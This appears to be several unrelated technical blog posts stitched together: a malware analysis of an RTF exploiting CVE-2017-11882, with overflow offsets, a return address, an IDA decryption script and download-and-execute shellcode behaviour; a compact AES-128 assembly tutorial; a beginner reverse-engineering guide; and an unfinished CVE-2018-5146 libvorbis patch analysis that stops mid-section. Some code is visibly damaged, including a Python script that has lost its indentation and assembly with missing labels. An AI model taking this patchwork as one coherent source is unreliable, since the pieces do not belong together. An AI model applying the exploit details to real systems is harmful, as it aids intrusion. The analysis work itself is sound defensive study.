CVE-2017–11882 RTF — Full description

Two weeks ago a malicious MS Word document was blocked from a sandbox (SHA 256 — 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7).The sample looked interesting because by that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017–11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is a quite complex structure by it self. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools to detect the malicious objects.

Firing up oletools/rtfobj and Didier’s rtdump, looking for OLE objects did not result to anything useful.

You can find a list about RTF obfuscation in the links below:

Unfortunately those didn’t help to find an OLE object, so we just looked for “d0cf” (OLE Compound header identifier) where one instance came up

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02–0000–0000-c000–000000000046” which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally one OLE Native Stream was identified (instead of an Equation Native stream).

How OLE Native Stream is related? Cofense has posted a relevant article.

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

The native stream is 0x795 (1945)bytes long. After that offset the actual content follows. One can guess, that the next 4 bytes, starting from 02 AB 01 E7 are related to Equation Editor MTEF header (given that no Equation Native Stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (Or not?). In addition, there are two extra bytes (0xA, 0x1) which do not map on the MTEF specification. If anyone knows how to interpret those bytes please illuminate me.

The most important part is the Font Record which have an ID of 0x8 and two one byte identifiers, one for typeface number an one for style (0x9D and 0x7C respectively). Following this byte sequence, the actual font name follows. Font name is stored in a buffer of 40 bytes length; 8 more are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe

It is well known, that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, the execution returns to our shellcode. Let’s fire up Windbg.

Prior to the ret instruction the last element in stack is our shellcode (0x0018f354). After the ret command this value will be popped to eip. We can see in the disassembly windows that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode I used shellcode2exe and fired IDA. The first call is the 0x004667b0 which is the import address of GlobalLock function call in EQNEDT32.exe which locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in a xor decryption loop. The xor decryption takes place in 0x3FE offset for 0x389 length. In order to help us with the decryption, a small IDA Python script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in console line in IDA.

```from binascii import hexlify
import struct
import ctypes
from ctypes import *
def run():
startPos = 0x4013fe
xored = 0
index = 0
for index in range (startPos,startPos + 0x389, 4):
xored = xored * 0x22A76047
xored = xored + 0x2698B12D
for i in range (0,4):
patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i)
PatchByte(index+i, patched_byte)

```

After the execution of the script, a URL appeared, therefore something good happened to us.

In the decryption loop the is a call in sub_40147e which before the decryption was meaningless, as the jmp destination was out of range.

However the same function, after the decryption is totally different. You can observe a lot of dynamic call instructions, which one can bet that they are function pointers resolved by GetProcAddress

In order not to make the post huge and being lazy enough to continue static analysis, Windbg came into the scene. Apparently what the shellcode does, can be summarized in the following steps:

• ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
• CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
• ExitProcess

That’s all folks! This post and any following ones are simply a notepad, which document some basic analysis steps. Any comments or corrections are more than welcome.

In the above we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting the CVE-2017–11882. We tried to analyze the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute shellcode.

AES-128 Block Cipher

Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

4 years later in November 2001, Rijndael by Belgian Cryptographers Vincent Rijmen and Joan Daemen which we now refer to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

AES Parameters

There are three different set of parameters available, with the main difference related to key length. Our implementation will be AES-128 which fits perfectly onto a 32-bit architecture

.

Key Length
(Nk words)
Block Size
(Nb words)
Number of Rounds
(Nr)
AES-128 4 4 10
AES-192 6 4 12
AES-256 8 4 14

Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstantwhich generate round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which makes the code more compact.

Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
W t=x&0x80808080;
return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
B i,y,c;
if(x){
for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
x=y;F(4)x^=y=(y<<1)|(y>>7);
}
return x^99;
}
void E(B *s){
W i,w,x[8],c=1,*k=(W*)&x[4];

// copy plain text + master key to x
F(8)x[i]=((W*)s)[i];

for(;;){
// 1st part of ExpandRoundKey, AddRoundKey and update state
w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

// 2nd part of ExpandRoundKey
w=R(w,8)^c;F(4)w=k[i]^=w;

// if round 11, stop else update c
if(c==108)break;c=M(c);

// SubBytes and ShiftRows
F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

// if not round 10, MixColumns
if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
}
}
```

x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register Description Used by
eax Accumulator lods, stos, scas, xlat, mul, div
ebx Base xlat
ecx Count loop, rep (conditional suffixes E/Z and NE/NZ)
edx Data cdq, mul, div
esi Source Index lods, movs, cmps
edi Destination Index stos, movs, scas, cmps
ebp Base Pointer enter, leave

Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from memory pointer in SI to AL before incrementing SI by 1. STOSB will store a byte in AL to memory pointer in DI before incrementing DI by 1. MOVSB will move a byte from memory pointer in SI to memory pointer in DI, before adding 1 to both SI and DI. If the same instruction is preceded REP (for repeat) then this also affects the CX register, decreasing by 1.

Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and 16-byte master key which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to swhile EDI will point to x

EAX will hold Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX than other registers. Byte comparisons are only 2 bytes for AL, while 3 for others.

```// 2 vs 3 bytes
/* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
/* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
/* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
/* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */
```

In addition to this, one operation requires saving EAX in another register, which only requires 1 byte with XCHG. Other registers would require 2 bytes

```// 1 vs 2 bytes
/* 0001 */ "\x92"                 /* xchg edx, eax        */
/* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */
```

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be : XOR EAX, EAX; INC EAX

```// 7 bytes
/* 0001 */ "\x6a\x01"             /* push 0x1             */
/* 0003 */ "\x58"                 /* pop eax              */
/* 0004 */ "\x6a\x04"             /* push 0x4             */
/* 0006 */ "\x59"                 /* pop ecx              */
/* 0007 */ "\x99"                 /* cdq                  */
```

Another way …

```// 7 bytes
/* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
/* 0003 */ "\xf7\xe1"             /* mul ecx              */
/* 0005 */ "\x40"                 /* inc eax              */
/* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */
```

And another..

```// 7 bytes
/* 0000 */ "\x6a\x01"             /* push 0x1             */
/* 0002 */ "\x58"                 /* pop eax              */
/* 0003 */ "\x99"                 /* cdq                  */
/* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */
```

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32-bytes of stack space, and PUSHAD which saves 8 general purpose registers on the stack is exactly 32-bytes of memory, executed in 1 byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

```// 5 bytes
/* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
/* 0004 */ "\xc9"             /* leave           */

// 6 bytes
/* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
/* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */

// 2 bytes
/* 0000 */ "\x60"             /* pushad          */
/* 0001 */ "\x61"             /* popad           */
```

Obviously the 2-byte example is better here, but once you require more than 96-bytes, usually ADD/SUB in combination with a register is the better option.

```; *****************************
; void E(void *s);
; *****************************
_E:
xor    ecx, ecx           ; ecx = 0
mul    ecx                ; eax = 0, edx = 0
inc    eax                ; c = 1
mov    cl, 4
; F(8)x[i]=((W*)s)[i];
mov    esi, [esp+64+4]    ; esi = s
mov    edi, esp
add    ecx, ecx           ; copy state + master key to stack
rep    movsd
```

Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

1. EBP has no 8-bit registers, so we can’t use it for any 8-bit operations.
2. Indirect memory access requires 1 byte more for index zero.
3. The only instructions that use EBP are ENTER and LEAVE.
```// 2 vs 3 bytes for indirect access
/* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
/* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */
```

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

```; *****************************
; Multiplication over GF(2**8)
; *****************************
push   ecx                ; save ecx
mov    cl, 4              ; 4 bytes
add    al, al             ; al <<= 1
jnc    \$+4                ;
xor    al, 27             ;
ror    eax, 8             ; rotate for next byte
loop   \$-9                ;
pop    ecx                ; restore ecx
ret
pop    ebp
```

SubByte

In the SubBytes step, each byte $a_{i,j}$ in the state matrix is replaced with $S(a_{i,j})$ using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over $GF(2^8)$, and we can implement SubByte purely using code.

```; *****************************
; B SubByte(B x)
; *****************************
sub_byte:
test   al, al            ; if(x){
jz     sb_l6
xchg   eax, edx
mov    cl, -1            ; i=255
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
mov    al, 1             ; y=1
sb_l1:
test   ah, ah            ; !c
jnz    sb_l2
cmp    al, dl            ; y!=x
setz   ah
jz     sb_l0
sb_l2:
mov    dh, al            ; y^=M(y)
call   ebp               ;
xor    al, dh
loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
mov    dl, al            ; dl=y
mov    cl, 4             ; i=4
sb_l5:
rol    dl, 1             ; y=R(y,1)
xor    al, dl            ; x^=y
loop   sb_l5             ; i--
sb_l6:
xor    al, 99            ; return x^99
mov    [esp+28], al
ret
```

The state matrix is combined with a subkey using the bitwise XOR operation. This step known as Key Whitening was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

```; *****************************
; *****************************
; F(4)s[i]=x[i]^k[i];
xchg   esi, edi           ; swap x and s
xor_key:
lodsd                     ; eax = x[i]
xor    eax, [edi+16]      ; eax ^= k[i]
stosd                     ; s[i] = eax
loop   xor_key
```

There are various cryptographic attacks possible against AES without this small, but important step. It protects against the Slide Attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants to generate round keys, all the round keys will be the same.

```; *****************************
; *****************************
; *k^=c; c=M(c);
xor    [esi+16], al
call   ebp
```

ExpandRoundKey

The operation to expand the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, these round keys are precomputed before the encryption process since you would only waste CPU cycles repeating the same computation which is unnecessary.

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

```; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
mov    eax, [esi+3*4]    ; w=k[3]
ror    eax, 8            ; w=R(w,8)
exp_l1:
call   S                 ; w=S(w)
ror    eax, 8            ; w=R(w,8);
loop   exp_l1
mov    cl, 4
exp_l2:
xor    [esi], eax        ; k[i]^=w
lodsd                    ; w=k[i]
loop   exp_l2
```

Combining the steps

An earlier version of the code used separate AddRoundKeyAddRoundConstant, and ExpandRoundKey, but since these steps all relate to using and updating the round key, the 3 steps are combined in order to reduce the number of loops, thus shaving off a few bytes.

```; *****************************
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
xchg   eax, edx
xchg   esi, edi
mov    eax, [esi+16+12]  ; w=R(k[3],8);
ror    eax, 8
xor_key:
mov    ebx, [esi+16]     ; t=k[i];
xor    [esi], ebx        ; x[i]^=t;
movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
call   sub_byte          ; al=S(al);
ror    eax, 8            ; w=R(w,8);
loop   xor_key
; w=R(w,8)^c;
xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
mov    cl, 4
exp_key:
xor    [esi], eax        ; k[i]^=w;
lodsd                    ; w=k[i];
loop   exp_key
```

Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because it doesn’t matter about the order of SubBytes and ShiftRows, they’re combined in one loop.

```; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
mov    cl, 16
shift_rows:
lodsb                    ; al = S(s[i])
call   sub_byte
push   edx
mov    ebx, edx          ; ebx = i%4
and    ebx, 3            ;
shr    edx, 2            ; (i/4 - ebx) % 4
sub    edx, ebx          ;
and    edx, 3            ;
lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
mov    [edi+ebx], al     ; x[ebx] = al
pop    edx
inc    edx
loop   shift_rows
```

Mixing Columns

The MixColumns transformation along with ShiftRows are the main source of diffusion. Each column is treated as a four-term polynomial $b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}$, where the coefficients are elements over ${GF} (2^{8})$, and is then multiplied modulo $x^{4}+1$ with a fixed polynomial $a(x)=3x^{3}+x^{2}+x+2$

```; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
mix_cols:
mov    eax, [edi]        ; w0 = x[i];
mov    ebx, eax          ; w1 = w0;
ror    eax, 8            ; w0 = R(w0,8);
mov    edx, eax          ; w2 = w0;
xor    eax, ebx          ; w0^= w1;
call   ebp               ; w0 = M(w0);
xor    eax, edx          ; w0^= w2;
ror    ebx, 16           ; w1 = R(w1,16);
xor    eax, ebx          ; w0^= w1;
ror    ebx, 8            ; w1 = R(w1,8);
xor    eax, ebx          ; w0^= w1;
stosd                    ; x[i] = w0;
loop   mix_cols
jmp    enc_main
```

Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then using the ciphertext to encrypt our plain text using a simple XOR operation. Since AES encrypts 16-byte blocks, a counter can be 8-bytes, and a nonce 8-bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

```// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
W i,r;
B t[32];

// copy master key to local buffer
F(16)t[i+16]=key[i];

while(len){
// copy counter+nonce to local buffer
F(16)t[i]=ctr[i];

// encrypt t
E(t);

// XOR plaintext with ciphertext
r=len>16?16:len;
F(r)in[i]^=t[i];

// update length + position
len-=r;in+=r;

// update counter
for(i=15;i>=0;i--)
if(++ctr[i])break;
}
}
```

In assembly

```; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
lea    esi,[esp+32+4]
lodsd
xchg   eax, ecx          ; ecx = len
lodsd
xchg   eax, ebp          ; ebp = ctr
lodsd
xchg   eax, edx          ; edx = in
lodsd
xchg   esi, eax          ; esi = key
; copy master key to local buffer
; F(16)t[i+16]=key[i];
lea    edi, [esp+16]     ; edi = &t[16]
movsd
movsd
movsd
movsd
aes_l0:
xor    eax, eax
jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
mov    edi, esp          ; edi = t
mov    esi, ebp          ; esi = ctr
push   edi
movsd
movsd
movsd
movsd
; encrypt t
call   _E                ; E(t)
pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
mov    bl, [edi+eax]     ;
xor    [edx], bl         ; *in++^=t[i];
inc    edx               ;
inc    eax               ; i++
cmp    al, 16            ;
loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
xchg   eax, ecx          ;
mov    cl, 16
aes_l2:
inc    byte[ebp+ecx-1]   ;
loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
xchg   eax, ecx
jmp    aes_l0
aes_l3:
ret
```

Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

Reverse Engineering Basic Programming Concepts

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

1. Variable Initiation
2. Basic Output
3. Mathematical Operations
4. Functions
5. Loops (For loop / While loop)
6. Conditional Statements (IF Statement / Switch Statement)
7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.

Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

1. a string
2. an int
3. a boolean
4. a char
5. a double
6. a float
7. a char array

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Now, let’s take a look at the assembly:

First, the string literal:

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

2. Subtraction
3. Multiplication
4. Division
5. Bitwise AND
6. Bitwise OR
7. Bitwise XOR
8. Bitwise NOT
9. Bitwise Right-Shift
10. Bitwise Left-Shift

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

We subtract using the ‘sub’ opcode:

We multiply using the ‘imul’ opcode:

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

We perform the Bitwise AND using the ‘and’ opcode:

We perform the Bitwise OR using the ‘or’ opcode:

We perform the Bitwise XOR using the ‘xor’ opcode:

We perform the Bitwise NOT using the ‘not’ opcode:

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Function Calls

In this section, we’ll be looking at 3 different types of functions:

1. a basic void function
2. a function that returns an integer
3. a function that takes in parameters

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

1. Debug Environment

• OS
• Windows 10
• Firefox_Setup_59.0.exe
• SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
• Xul.dll
• SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
Basically contains some user define comment, such as Vendor infomation。
Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.

Vorbis Identification Header structure can be illustrated as follow:

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure：

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue，element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

